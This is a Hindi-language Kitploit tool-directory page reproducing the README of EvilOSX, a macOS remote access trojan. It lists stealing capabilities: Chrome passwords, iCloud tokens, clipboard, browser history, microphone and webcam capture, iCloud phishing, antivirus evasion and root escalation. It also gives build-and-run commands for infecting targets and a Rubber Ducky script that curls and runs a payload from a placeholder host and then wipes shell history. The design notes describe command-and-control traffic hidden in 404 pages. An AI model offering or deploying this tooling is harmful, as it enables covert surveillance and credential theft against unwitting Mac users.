Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/marten4n6/evilosx
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिपेलोड जनरेशनस्थायित्व तंत्रजानकारी एकत्र करनापोस्ट-शोषणफिशिंगकमांड एंड कंट्रोलरिमोट एक्सेस ट्रोजन
GitHubmarten4n6/evilosx

EvilOSX

एक दुष्ट RAT (दूरस्थ प्रशासन उपकरण) macOS / OS X के लिए।

2.4k48795 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें


लोगो
EvilOSX

macOS / OS X के लिए एक दुष्ट RAT (रिमोट प्रशासन उपकरण)।

License Python Issues Build Status Contributing


Marco Generator Cedric Owens द्वारा

यह परियोजना अब सक्रिय नहीं है

विशेषताएँ

  • एक टर्मिनल इंस्टेंस का अनुकरण करें
  • सरल विस्तार योग्य मॉड्यूल प्रणाली
  • कोई बॉट निर्भरता नहीं (शुद्ध पायथन)
  • एंटी-वायरस द्वारा अज्ञात (OpenSSL AES-256 एन्क्रिप्टेड पेलोड)
  • स्थायी
  • GUI और CLI समर्थन
  • Chrome पासवर्ड प्राप्त करें
  • iCloud टोकन और संपर्क प्राप्त करें
  • क्लिपबोर्ड प्राप्त करें/निगरानी करें
  • ब्राउज़र इतिहास प्राप्त करें (Chrome और Safari)
  • iTunes के माध्यम से iCloud पासवर्ड के लिए फिश करें
  • iTunes (iOS) बैकअप गणना
  • माइक्रोफ़ोन रिकॉर्ड करें
  • वेबकैम का उपयोग करके डेस्कटॉप स्क्रीनशॉट या चित्र लें
  • स्थानीय विशेषाधिकार वृद्धि के माध्यम से रूट प्राप्त करने का प्रयास करें

उपयोग कैसे करें

root@kitploit:~
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

चेतावनी: चूंकि पेलोड लक्ष्य प्रणाली के अनुसार अद्वितीय बनाए जाते हैं (सर्वर द्वारा स्वचालित रूप से), जब कोई बॉट पहली बार कनेक्ट होता है तो सर्वर को चल रहा होना चाहिए।

उन्नत उपयोगकर्ता

यदि आप SSH पर इसका उपयोग करना चाहते हैं तो एक CLI भी है:

root@kitploit:~
# Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s)

स्क्रीनशॉट

CLI GUI

प्रेरणा

यह परियोजना मेरे Rubber Ducky के साथ उपयोग के लिए बनाई गई थी, यहाँ सरल स्क्रिप्ट है:

root@kitploit:~
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
  • किसी भी अनलॉक Mac को बैकडोर करने में लगभग 10 सेकंड लगते हैं, जो कि...... अच्छा है
  • Terminal जानबूझकर ऐसे लिखा गया है, कुछ सिस्टम पर स्पॉटलाइट अन्यथा टर्मिनल नहीं ढूंढ पाएगा।
  • कीबोर्ड सेटअप असिस्टेंट को बायपास करने के लिए सुनिश्चित करें कि आप VID&PID बदलते हैं जो यहाँ पाया जा सकता है।
    Aluminum Keyboard (ISO) शायद वही है जिसकी आप तलाश कर रहे हैं।

संस्करण

EvilOSX का रखरखाव जितना संभव हो सेमैंटिक वर्जनिंग दिशानिर्देशों के तहत किया जाएगा।
सर्वर और बॉट रिलीज़ को निम्नलिखित प्रारूप के साथ क्रमांकित किया जाएगा:

root@kitploit:~
<major>.<minor>.<patch>

और निम्नलिखित दिशानिर्देशों के साथ निर्मित:

  • पिछड़ी संगतता को तोड़ने (पुराने बॉट के साथ) से मेजर बढ़ता है
  • पिछड़ी संगतता को तोड़े बिना नए जोड़ से माइनर बढ़ता है
  • बग फिक्स और विविध परिवर्तन से पैच बढ़ता है

SemVer पर अधिक जानकारी के लिए, कृपया https://semver.org/ पर जाएं।

डिज़ाइन नोट्स

  • एक मशीन को संक्रमित करना तीन भागों में बांटा गया है:
    • लक्ष्य मशीन पर एक लॉन्चर चलाया जाता है जिसका एकमात्र लक्ष्य स्टेजर को चलाना है
    • स्टेजर सर्वर से एक लोडर का अनुरोध करता है जो यह संभालता है कि पेलोड कैसे लोड किया जाएगा
    • लोडर को विशिष्ट रूप से एन्क्रिप्टेड पेलोड दिया जाता है और फिर स्टेजर को वापस भेज दिया जाता है
  • सर्वर HTTP 404 त्रुटि पृष्ठों में छिपे संदेश भेजकर अपने संचार को छिपाता है (ब्लैकहैट के "Hiding In Plain Sight" से)
    • कमांड अनुरोध GET अनुरोध के माध्यम से सर्वर से प्राप्त किए जाते हैं
    • कमांड प्रतिक्रियाएँ POST अनुरोध के माध्यम से सर्वर को भेजी जाती हैं
  • मॉड्यूल पायथन की गतिशील प्रकृति का लाभ उठाते हैं, उन्हें किसी भी कॉन्फ़िगरेशन विकल्पों के साथ zlib के साथ संपीड़ित करके नेटवर्क पर भेजा जाता है
  • चूंकि बॉट केवल सर्वर से संचार करता है और कभी विपरीत नहीं, सर्वर के पास यह जानने का कोई तरीका नहीं है कि बॉट कब ऑफलाइन हो जाता है

मुद्दे

कृपया बेझिझक कोई भी मुद्दा या सुविधा अनुरोध यहाँ सबमिट करें।

योगदान

मॉड्यूल बनाने के तरीके के लिए एक सरल गाइड के लिए यहाँ क्लिक करें।

श्रेय

  • अद्भुत Empire परियोजना
  • Patrick Wardle को उनकी शानदार बातों के लिए धन्यवाद, Objective-See देखें
  • manwhoami को उनकी परियोजनाओं के लिए: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
    (अब हटा दिया गया है... यदि आप फिर से प्रकट होते हैं तो मुझे बताएं)
  • slowloris मॉड्यूल लगभग PySlowLoris से कॉपी किया गया है
  • urwid और यह कोड जिसने CLI के साथ मेरा बहुत समय बचाया
  • motusora द्वारा बनाया गया लोगो

लाइसेंस

GPLv3

टूल डाउनलोड करें